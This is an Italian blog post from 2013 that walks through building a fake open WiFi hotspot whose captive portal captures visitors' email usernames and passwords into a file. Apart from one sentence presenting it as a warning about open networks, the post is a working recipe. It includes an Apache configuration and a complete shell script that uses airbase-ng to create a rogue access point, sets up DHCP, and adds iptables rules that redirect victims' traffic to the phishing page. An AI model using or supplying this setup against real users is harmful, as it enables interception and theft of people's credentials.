giovedì 21 novembre 2013

Creare un semplice "captive portal WIFI"

In sostanza si tratta di creare un finto portale WIFI ,che promettendo un libero accesso ad internet, intercetta alcuni dati sensibili. Questo esempio dovrebbe mettervi in guardia circa l' utilizzo di reti WIFI trovate aperte.
Supponiamo di utilizzare ubuntu, per prima cosa installate il necessario per poter realizzare un hotspot WIFI seguendo questa  guida attacco-mitm.Dopo dovete installare il server LAMP, se non sapete come fare esistono centinaia di guide sull' argomento, basta usare google. Quando avete istallato il server aprite ,da root, il file di configurazione:

sudo gedit /etc/apache2/httpd.conf

copiare la seguente configurazione e salvare:

ServerName webserver
DocumentRoot /var/www
ServerRoot /etc/apache2
Listen 8080
#inserire il proprio user e group
User miouser
Group miogroup
<Directory /var/www>
    order deny,allow
    allow from all
</Directory>

Adesso bisogna preparare le pagine web da mettere sul nostro portale, qui potete dare sfogo alla vostra immaginazione. Io come esempio ho preparato una semplicissima pagina che memorizza in un file "user" e "pass" di una casella email (potete scaricarlo a questo indirizzo). Dopo aver copiato i file nella directory /var/www (ricordate di chiamare la pagina di ingresso del portale index.php), creiamo uno script che configura l'hotspot e reindirizza l'utente, copiate il file e salvatelo come "captive.sh":

#!/bin/sh
pkill airbase-ng
sleep 2;
pkill dhcpd3
sleep 5;
airmon-ng start wlan0 
sleep 5;
airbase-ng -e miarete -c 9 mon0 &
sleep 5;
ifconfig at0 up
ifconfig at0 192.168.2.129 netmask 255.255.255.128
route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129 
sleep 5;
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o wlan1 -j MASQUERADE 
iptables -A PREROUTING -t nat -i at0 -p tcp -j REDIRECT --to-ports 8080
dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0 &
echo 1 > /proc/sys/net/ipv4/ip_forward


Per eseguire il tutto dovete lanciare il server:

sudo service apache2 start

ed eseguire lo script:

sudo ./captive.sh

Quando un utente si collega al vostro hotspot si troverà indirizzato sulla vostra pagina di ingresso, nel mio esempio questa:




Una volta che l'utente invierà il form i suoi dati verranno memorizzati nel file formdata.txt.

Nessun commento:

Posta un commento